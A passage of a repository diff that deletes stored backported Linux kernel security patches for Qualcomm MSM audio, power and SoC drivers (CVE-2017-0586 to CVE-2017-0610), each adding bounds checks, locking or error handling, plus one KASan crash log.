-@@ -113,17 +113,16 @@ static ssize_t ath_procfs_diag_read(struct file *file, char __user *buf,
- 					(A_UINT8 *)read_buffer, count);
- 	}
- 
-+	if (rv)
-+		return -EIO;
-+
- 	if(copy_to_user(buf, read_buffer, count)) {
- 		vos_mem_free(read_buffer);
- 		return -EFAULT;
- 	} else
- 		vos_mem_free(read_buffer);
- 
--	if (rv == 0) {
--		return count;
--	} else {
--		return -EIO;
--	}
-+	return count;
- }
- 
- static ssize_t ath_procfs_diag_write(struct file *file, const char __user *buf,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch
deleted file mode 100644
index 9da502d5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0586/ANY/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From 05bacdc0f9c16c58326a4be9e88afa870cf1024e Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Thu, 9 Feb 2017 16:04:21 -0800
-Subject: [PATCH] ASoC: msm: qdsp6v2: Fix out-of-bounds access in put functions
-
-Add out of bounds check in routing put functions
-for the mux value before accessing the texts
-pointer of soc_enum struct with mux as index.
-
-CRs-fixed: 1097569
-Bug: 33649808
-Change-Id: Ib9ef8d398f0765754b0f79666963fac043b66077
-Signed-off-by: Karthikeyan Mani <kmani@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
- mode change 100755 => 100644 sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-old mode 100755
-new mode 100644
-index 97c914ac35a4a..adbeb77bcb912
---- a/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-routing-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2272,6 +2272,11 @@ static int msm_routing_ec_ref_rx_put(struct snd_kcontrol *kcontrol,
- 	struct snd_soc_dapm_update *update = NULL;
-   	int valid_port = true;
- 
-+	if (mux >= e->items) {
-+		pr_err("%s: Invalid mux value %d\n", __func__, mux);
-+		return -EINVAL;
-+	}
-+
- 	mutex_lock(&routing_lock);
- 	switch (ucontrol->value.integer.value[0]) {
- 	case 0:
-@@ -2439,6 +2444,11 @@ static int msm_routing_ext_ec_put(struct snd_kcontrol *kcontrol,
- 	uint16_t ext_ec_ref_port_id;
- 	struct snd_soc_dapm_update *update = NULL;
- 
-+	if (mux >= e->items) {
-+		pr_err("%s: Invalid mux value %d\n", __func__, mux);
-+		return -EINVAL;
-+	}
-+
- 	mutex_lock(&routing_lock);
- 	msm_route_ext_ec_ref = ucontrol->value.integer.value[0];
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch
deleted file mode 100644
index 8e01dbee..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0604/ANY/0001.patch
+++ /dev/null
@@ -1,81 +0,0 @@
-From 6975e2dd5f37de965093ba3a8a08635a77a960f7 Mon Sep 17 00:00:00 2001
-From: David Keitel <dkeitel@codeaurora.org>
-Date: Mon, 20 Apr 2015 15:51:33 -0700
-Subject: bcl: fix allocation for BCL attribute
-
-The size of the BCL attribute is incorrect due to a precedence bug:
-
-This was observed while booting with Kernel Address Sanitizer(KASan) enabled.
-
-=============================================================================
-BUG kmalloc-64 (Tainted: G    B       ): kasan: bad access detected
------------------------------------------------------------------------------
-
-INFO: Slab 0xffffffbc0661c6e0 objects=64 used=64 fp=0x          (null) flags=0x0080
-INFO: Object 0xffffffc0a360bb00 @offset=2816 fp=0xffffffc0a3454728
-
-Bytes b4 ffffffc0a360baf0: 3f 37 9c 1c 00 00 00 00 02 00 02 00 a9 4e ad de  ?7...........N..
-Object ffffffc0a360bb00: 28 47 45 a3 c0 ff ff ff 48 47 45 a3 c0 ff ff ff  (GE.....HGE.....
-Object ffffffc0a360bb10: 68 47 45 a3 c0 ff ff ff 00 00 00 00 00 00 00 00  hGE.............
-Object ffffffc0a360bb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffffffc0a360bb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-CPU: 0 PID: 1 Comm: swapper/0 Tainted: G    B        3.10.49-g465b172-00133-gb931dc1 #134
-Call trace:
-[<ffffffc00040a2a4>] dump_backtrace+0x0/0x1d4
-[<ffffffc00040a488>] show_stack+0x10/0x1c
-[<ffffffc000f971a4>] dump_stack+0x1c/0x28
-[<ffffffc00054aeb4>] print_trailer+0x144/0x158
-[<ffffffc00054b210>] object_err+0x38/0x4c
-[<ffffffc00054fed8>] kasan_report_error+0x210/0x3b0
-[<ffffffc000550188>] kasan_report+0x68/0x78
-[<ffffffc00054f1b0>] __asan_load8+0x90/0x9c
-[<ffffffc0005dff78>] internal_create_group+0x1a0/0x2f4
-[<ffffffc0005e00dc>] sysfs_create_group+0x10/0x1c
-[<ffffffc000c5eb9c>] msm_bcl_register_param+0x384/0x450
-[<ffffffc000c61758>] bcl_probe+0x840/0xb84
-[<ffffffc000a394b8>] spmi_drv_probe+0x2c/0x3c
-[<ffffffc000999150>] driver_probe_device+0x1f4/0x47c
-[<ffffffc0009994c4>] __driver_attach+0x88/0xc0
-[<ffffffc000996434>] bus_for_each_dev+0xdc/0x11c
-[<ffffffc0009988ac>] driver_attach+0x2c/0x3c
-[<ffffffc0009981fc>] bus_add_driver+0x1bc/0x32c
-[<ffffffc000999d1c>] driver_register+0x10c/0x1d8
-[<ffffffc000a39a30>] spmi_driver_register+0x98/0xa8
-[<ffffffc00183a300>] bcl_perph_init+0x2c/0x38
-[<ffffffc000400b00>] do_one_initcall+0xcc/0x188
-[<ffffffc001800b54>] kernel_init_freeable+0x1c0/0x264
-[<ffffffc000f89b84>] kernel_init+0x10/0xcc
-Memory state around the buggy address:
- ffffffc0a360ba00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc0a360ba80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
->ffffffc0a360bb00: 00 00 00 01 fc fc fc fc fc fc fc fc fc fc fc fc
-                            ^
- ffffffc0a360bb80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffffffc0a360bc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-==================================================================
-
-Fix this by adding parantheses to fix precedence.
-
-CRs-Fixed: 826589
-Change-Id: Ia58b6e52c491b89b10a2b8fe45445372bfe9fa20
-Signed-off-by: David Keitel <dkeitel@codeaurora.org>
----
- drivers/power/msm_bcl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/power/msm_bcl.c b/drivers/power/msm_bcl.c
-index d36dfd2..6b7cefd 100644
---- a/drivers/power/msm_bcl.c
-+++ b/drivers/power/msm_bcl.c
-@@ -301,7 +301,7 @@ static int bcl_add_sysfs_nodes(enum bcl_param param_type)
- 		return ret;
- 	}
- 	bcl[param_type]->bcl_attr_gp.attrs = kzalloc(sizeof(struct attribute *)
--		* BCL_PARAM_MAX_ATTR + 1, GFP_KERNEL);
-+		* (BCL_PARAM_MAX_ATTR + 1), GFP_KERNEL);
- 	if (!bcl[param_type]->bcl_attr_gp.attrs) {
- 		pr_err("Sysfs attribute create failed.\n");
- 		ret = -ENOMEM;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch
deleted file mode 100644
index 7ad60b22..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0606/ANY/0001.patch
+++ /dev/null
@@ -1,130 +0,0 @@
-From d3237316314c3d6f75a58192971f66e3822cd250 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Thu, 26 Jan 2017 15:02:42 -0800
-Subject: drivers: soc: add mutex to prevent response being processed twice
-
-Add a mutex to prevent two threads from processing the same response
-at the same time. This ensures responses are processed completely and
-sequentially.
-
-CRs-Fixed: 1116015
-Change-Id: Id2ef32edb939f8af2850b54bd6f6f447939c0732
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 26 ++++++++++++++++++++------
- 1 file changed, 20 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 50dd925..10f71b8 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -42,6 +42,12 @@ struct voice_svc_prvt {
- 	struct list_head response_queue;
- 	wait_queue_head_t response_wait;
- 	spinlock_t response_lock;
-+	/*
-+	 * This mutex ensures responses are processed in sequential order and
-+	 * that no two threads access and free the same response at the same
-+	 * time.
-+	 */
-+	struct mutex response_mutex_lock;
- };
- 
- struct apr_data {
-@@ -467,6 +473,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 		goto done;
- 	}
- 
-+	mutex_lock(&prtd->response_mutex_lock);
- 	spin_lock_irqsave(&prtd->response_lock, spin_flags);
- 
- 	if (list_empty(&prtd->response_queue)) {
-@@ -480,7 +487,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 			pr_debug("%s: Read timeout\n", __func__);
- 
- 			ret = -ETIMEDOUT;
--			goto done;
-+			goto unlock;
- 		} else if (ret > 0 && !list_empty(&prtd->response_queue)) {
- 			pr_debug("%s: Interrupt recieved for response\n",
- 				 __func__);
-@@ -488,7 +495,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 			pr_debug("%s: Interrupted by SIGNAL %d\n",
- 				 __func__, ret);
- 
--			goto done;
-+			goto unlock;
- 		}
- 
- 		spin_lock_irqsave(&prtd->response_lock, spin_flags);
-@@ -507,7 +514,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 		       __func__, count, size);
- 
- 		ret = -ENOMEM;
--		goto done;
-+		goto unlock;
- 	}
- 
- 	if (!access_ok(VERIFY_WRITE, arg, size)) {
-@@ -515,7 +522,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 		       __func__);
- 
- 		ret = -EPERM;
--		goto done;
-+		goto unlock;
- 	}
- 
- 	ret = copy_to_user(arg, &resp->resp,
-@@ -525,7 +532,7 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 		pr_err("%s: copy_to_user failed %d\n", __func__, ret);
- 
- 		ret = -EPERM;
--		goto done;
-+		goto unlock;
- 	}
- 
- 	spin_lock_irqsave(&prtd->response_lock, spin_flags);
-@@ -539,6 +546,8 @@ static ssize_t voice_svc_read(struct file *file, char __user *arg,
- 
- 	ret = count;
- 
-+unlock:
-+	mutex_unlock(&prtd->response_mutex_lock);
- done:
- 	return ret;
- }
-@@ -594,6 +603,7 @@ static int voice_svc_open(struct inode *inode, struct file *file)
- 	INIT_LIST_HEAD(&prtd->response_queue);
- 	init_waitqueue_head(&prtd->response_wait);
- 	spin_lock_init(&prtd->response_lock);
-+	mutex_init(&prtd->response_mutex_lock);
- 	file->private_data = (void *)prtd;
- 
- 	/* Current APR implementation doesn't support session based
-@@ -644,6 +654,7 @@ static int voice_svc_release(struct inode *inode, struct file *file)
- 			pr_err("%s: Failed to dereg MVM %d\n", __func__, ret);
- 	}
- 
-+	mutex_lock(&prtd->response_mutex_lock);
- 	spin_lock_irqsave(&prtd->response_lock, spin_flags);
- 
- 	while (!list_empty(&prtd->response_queue)) {
-@@ -657,6 +668,9 @@ static int voice_svc_release(struct inode *inode, struct file *file)
- 	}
- 
- 	spin_unlock_irqrestore(&prtd->response_lock, spin_flags);
-+	mutex_unlock(&prtd->response_mutex_lock);
-+
-+	mutex_destroy(&prtd->response_mutex_lock);
- 
- 	kfree(file->private_data);
- 	file->private_data = NULL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch
deleted file mode 100644
index 1e82a147..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0607/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From b003c8d5407773d3aa28a48c9841e4c124da453d Mon Sep 17 00:00:00 2001
-From: Banajit Goswami <bgoswami@codeaurora.org>
-Date: Thu, 3 Nov 2016 19:18:07 -0700
-Subject: ASoC: msm: q6dspv2: use correct variable type to store ION buff size
-
-The size of the physical memory allocated for ION buffers
-are of type size_t. Change updates the type of variables
-sent to ION drivers to size_t to avoid any mismatch.
-
-Change-Id: I3d33ed922b979652c64027e6f1c6f0a8ed4850a3
-Signed-off-by: Banajit Goswami <bgoswami@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/q6asm.c   | 10 ++++++----
- sound/soc/msm/qdsp6v2/q6voice.h |  2 +-
- 2 files changed, 7 insertions(+), 5 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 0ea94cb..ea57cda 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -3013,7 +3013,8 @@ int q6asm_set_shared_circ_buff(struct audio_client *ac,
- 			       int dir)
- {
- 	struct audio_buffer *buf_circ;
--	int bytes_to_alloc, rc, len;
-+	int bytes_to_alloc, rc;
-+	size_t len;
- 
- 	buf_circ = kzalloc(sizeof(struct audio_buffer), GFP_KERNEL);
- 
-@@ -3032,7 +3033,7 @@ int q6asm_set_shared_circ_buff(struct audio_client *ac,
- 	rc = msm_audio_ion_alloc("audio_client", &buf_circ->client,
- 			&buf_circ->handle, bytes_to_alloc,
- 			(ion_phys_addr_t *)&buf_circ->phys,
--			(size_t *)&len, &buf_circ->data);
-+			&len, &buf_circ->data);
- 
- 	if (rc) {
- 		pr_err("%s: Audio ION alloc is failed, rc = %d\n", __func__,
-@@ -3074,7 +3075,8 @@ int q6asm_set_shared_pos_buff(struct audio_client *ac,
- 			       int dir)
- {
- 	struct audio_buffer *buf_pos = &ac->shared_pos_buf;
--	int len, rc;
-+	int rc;
-+	size_t len;
- 	int bytes_to_alloc = sizeof(struct asm_shared_position_buffer);
- 
- 	mutex_lock(&ac->cmd_lock);
-@@ -3083,7 +3085,7 @@ int q6asm_set_shared_pos_buff(struct audio_client *ac,
- 
- 	rc = msm_audio_ion_alloc("audio_client", &buf_pos->client,
- 			&buf_pos->handle, bytes_to_alloc,
--			(ion_phys_addr_t *)&buf_pos->phys, (size_t *)&len,
-+			(ion_phys_addr_t *)&buf_pos->phys, &len,
- 			&buf_pos->data);
- 
- 	if (rc) {
-diff --git a/sound/soc/msm/qdsp6v2/q6voice.h b/sound/soc/msm/qdsp6v2/q6voice.h
-index 3b3e728..834fe7c 100644
---- a/sound/soc/msm/qdsp6v2/q6voice.h
-+++ b/sound/soc/msm/qdsp6v2/q6voice.h
-@@ -142,7 +142,7 @@ struct share_mem_buf {
- struct mem_map_table {
- 	dma_addr_t		phys;
- 	void			*data;
--	uint32_t		size; /* size of buffer */
-+	size_t			size; /* size of buffer */
- 	struct ion_handle	*handle;
- 	struct ion_client	*client;
- };
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch
deleted file mode 100644
index 7927afa7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 167a094eac4383809dd703d96fb88c406dd8786b Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye <benyxy@codeaurora.org>
-Date: Tue, 20 Dec 2016 10:56:59 -0800
-Subject: mfd: wcd9xxx: Add range checking in function wcd9xxx_init_slimslave
-
-Range checking is added to prevent buffer overflow.
-
-CRs-Fixed: 1098363
-Change-Id: I5871a3a11ec5f5106a386bf149d7ec22605f3db8
-Signed-off-by: Xiaoyu Ye <benyxy@codeaurora.org>
----
- drivers/mfd/wcd9xxx-slimslave.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/mfd/wcd9xxx-slimslave.c b/drivers/mfd/wcd9xxx-slimslave.c
-index 4bce440..1ac7b59 100644
---- a/drivers/mfd/wcd9xxx-slimslave.c
-+++ b/drivers/mfd/wcd9xxx-slimslave.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -62,6 +62,10 @@ int wcd9xxx_init_slimslave(struct wcd9xxx *wcd9xxx, u8 wcd9xxx_pgd_la,
- 		goto err;
- 	}
- 
-+	if (!rx_num || rx_num > wcd9xxx->num_rx_port) {
-+		pr_err("%s: invalid rx num %d\n", __func__, rx_num);
-+		return -EINVAL;
-+	}
- 	if (wcd9xxx->rx_chs) {
- 		wcd9xxx->num_rx_port = rx_num;
- 		for (i = 0; i < rx_num; i++) {
-@@ -84,6 +88,10 @@ int wcd9xxx_init_slimslave(struct wcd9xxx *wcd9xxx, u8 wcd9xxx_pgd_la,
- 			wcd9xxx->num_rx_port);
- 	}
- 
-+	if (!tx_num || tx_num > wcd9xxx->num_tx_port) {
-+		pr_err("%s: invalid tx num %d\n", __func__, tx_num);
-+		return -EINVAL;
-+	}
- 	if (wcd9xxx->tx_chs) {
- 		wcd9xxx->num_tx_port = tx_num;
- 		for (i = 0; i < tx_num; i++) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch
deleted file mode 100644
index 0b4299e7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0608/4.4/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From b66f442dd97c781e873e8f7b248e197f86fd2980 Mon Sep 17 00:00:00 2001
-From: Xiaoyu Ye <benyxy@codeaurora.org>
-Date: Mon, 19 Dec 2016 18:38:53 -0800
-Subject: ASoC: msm: qdsp6v2: Add range checking in msm_dai_q6_set_channel_map
-
-Range checking is added to prevent buffer overflow that due to inputs
-can be set by user space.
-
-CRs-Fixed: 1098363
-Change-Id: I057261291806240ee6d7b8106a5e83a7665e013d
-Signed-off-by: Xiaoyu Ye <benyxy@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-index 26cdd0f..fa21ec5 100644
---- a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1889,6 +1889,11 @@ static int msm_dai_q6_set_channel_map(struct snd_soc_dai *dai,
- 			pr_err("%s: rx slot not found\n", __func__);
- 			return -EINVAL;
- 		}
-+		if (rx_num > AFE_PORT_MAX_AUDIO_CHAN_CNT) {
-+			pr_err("%s: invalid rx num %d\n", __func__, rx_num);
-+			return -EINVAL;
-+		}
-+
- 		for (i = 0; i < rx_num; i++) {
- 			dai_data->port_config.slim_sch.shared_ch_mapping[i] =
- 			    rx_slot[i];
-@@ -1922,6 +1927,11 @@ static int msm_dai_q6_set_channel_map(struct snd_soc_dai *dai,
- 			pr_err("%s: tx slot not found\n", __func__);
- 			return -EINVAL;
- 		}
-+		if (tx_num > AFE_PORT_MAX_AUDIO_CHAN_CNT) {
-+			pr_err("%s: invalid tx num %d\n", __func__, tx_num);
-+			return -EINVAL;
-+		}
-+
- 		for (i = 0; i < tx_num; i++) {
- 			dai_data->port_config.slim_sch.shared_ch_mapping[i] =
- 			    tx_slot[i];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch
deleted file mode 100644
index 8ae0e3a5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0609/ANY/0001.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From 38a83df036084c00e8c5a4599c8ee7880b4ee567 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 21 Dec 2016 14:43:46 +0800
-Subject: ASoC: msm-cpe-lsm: cleanup ioctl functions
-
-Some of the ioctl command handling is not properly using the
-copy_from_user interface. Fix these issues and cleanup the ioctl
-functions to make sure there is no illegal memory access.
-
-CRs-Fixed: 1090482
-Change-Id: Ib18e4b132d3487a3103335768aad5df2ebe13f2d
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c | 51 +++++++++++++--------------------------------
- 1 file changed, 14 insertions(+), 37 deletions(-)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index ef4c9b0..0b77e8c 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1179,13 +1179,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		dev_dbg(rtd->dev,
- 			"%s: %s\n",
- 			__func__, "SNDRV_LSM_REG_SND_MODEL_V2");
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid argument to ioctl %s\n",
--				__func__,
--				"SNDRV_LSM_REG_SND_MODEL_V2");
--			return -EINVAL;
--		}
- 
- 		memcpy(&snd_model, arg,
- 			sizeof(struct snd_lsm_sound_model_v2));
-@@ -1328,13 +1321,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		dev_dbg(rtd->dev,
- 			"%s: %s\n",
- 			__func__, "SNDRV_LSM_EVENT_STATUS");
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: Invalid argument to ioctl %s\n",
--				__func__,
--				"SNDRV_LSM_EVENT_STATUS");
--			return -EINVAL;
--		}
- 
- 		user = arg;
- 
-@@ -1437,12 +1423,6 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 		break;
- 
- 	case SNDRV_LSM_SET_PARAMS:
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s Invalid argument\n",
--				__func__, "SNDRV_LSM_SET_PARAMS");
--			return -EINVAL;
--		}
- 		memcpy(&det_params, arg,
- 			sizeof(det_params));
- 		if (det_params.num_confidence_levels <= 0) {
-@@ -2289,12 +2269,6 @@ done:
- }
- 
- #ifdef CONFIG_COMPAT
--struct snd_lsm_event_status32 {
--	u16 status;
--	u16 payload_size;
--	u8 payload[0];
--};
--
- struct snd_lsm_sound_model_v2_32 {
- 	compat_uptr_t data;
- 	compat_uptr_t confidence_level;
-@@ -2326,8 +2300,6 @@ struct snd_lsm_module_params_32 {
- };
- 
- enum {
--	SNDRV_LSM_EVENT_STATUS32 =
--		_IOW('U', 0x02, struct snd_lsm_event_status32),
- 	SNDRV_LSM_REG_SND_MODEL_V2_32 =
- 		_IOW('U', 0x07, struct snd_lsm_sound_model_v2_32),
- 	SNDRV_LSM_SET_PARAMS32 =
-@@ -2421,7 +2393,7 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 				err);
- 	}
- 		break;
--	case SNDRV_LSM_EVENT_STATUS32: {
-+	case SNDRV_LSM_EVENT_STATUS: {
- 		struct snd_lsm_event_status *event_status = NULL;
- 		struct snd_lsm_event_status u_event_status32;
- 		struct snd_lsm_event_status *udata_32 = NULL;
-@@ -2463,7 +2435,6 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		} else {
- 			event_status->payload_size =
- 				u_event_status32.payload_size;
--			cmd = SNDRV_LSM_EVENT_STATUS;
- 			err = msm_cpe_lsm_ioctl_shared(substream,
- 						       cmd, event_status);
- 			if (err)
-@@ -2563,13 +2534,6 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 			return -EINVAL;
- 		}
- 
--		if (!arg) {
--			dev_err(rtd->dev,
--				"%s: %s: No Param data to set\n",
--				__func__, "SET_MODULE_PARAMS_32");
--			return -EINVAL;
--		}
--
- 		if (copy_from_user(&p_data_32, arg,
- 				   sizeof(p_data_32))) {
- 			dev_err(rtd->dev,
-@@ -2647,6 +2611,19 @@ static int msm_cpe_lsm_ioctl_compat(struct snd_pcm_substream *substream,
- 		kfree(params32);
- 		break;
- 	}
-+	case SNDRV_LSM_REG_SND_MODEL_V2:
-+	case SNDRV_LSM_SET_PARAMS:
-+	case SNDRV_LSM_SET_MODULE_PARAMS:
-+		/*
-+		 * In ideal cases, the compat_ioctl should never be called
-+		 * with the above unlocked ioctl commands. Print error
-+		 * and return error if it does.
-+		 */
-+		dev_err(rtd->dev,
-+			"%s: Invalid cmd for compat_ioctl\n",
-+			__func__);
-+		err = -EINVAL;
-+		break;
- 	default:
- 		err = msm_cpe_lsm_ioctl_shared(substream, cmd, arg);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch
deleted file mode 100644
index 04de703c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 65009746a6e649779f73d665934561ea983892fe Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Mon, 5 Dec 2016 12:26:52 -0800
-Subject: ASoC: msm: qdsp6v2: return error when copy from userspace fails
-
-A copy_from_user is not always expected to succeed. Therefore, check
-for an error before operating on the buffer post copy.
-
-Change-Id: Ibba9a47c84e735d30e32eeac5b80d51044b7a9e8
-CRs-Fixed: 1094852
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-index 6570819..c444a27 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-@@ -823,6 +823,11 @@ static int msm_pcm_playback_copy(struct snd_pcm_substream *substream, int a,
- 					(sizeof(buf_node->frame.frm_hdr) +
- 					 sizeof(buf_node->frame.pktlen));
- 			}
-+			if (ret) {
-+				pr_err("%s: copy from user failed %d\n",
-+				       __func__, ret);
-+				return -EFAULT;
-+			}
- 			spin_lock_irqsave(&prtd->dsp_lock, dsp_flags);
- 			list_add_tail(&buf_node->list, &prtd->in_queue);
- 			spin_unlock_irqrestore(&prtd->dsp_lock, dsp_flags);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch
deleted file mode 100644
index 88feecdf..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0610/ANY/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 2bf336ed7ff29768b63fcf0d9528dd129f516643 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 31 Jan 2017 12:21:38 -0800
-Subject: ASoC: msm: qdsp6v2: return error when copy from userspace fails
-
-A copy_from_user is not always expected to succeed. Therefore, check
-for an error before operating on the buffer post copy.
-
-CRs-Fixed: 1116070
-Change-Id: I21032719e6e85f280ca0cda875c84ac8dee8916b
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c | 17 +++++++++++------
- 1 file changed, 11 insertions(+), 6 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-index c444a27..b2387a7 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-voip-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
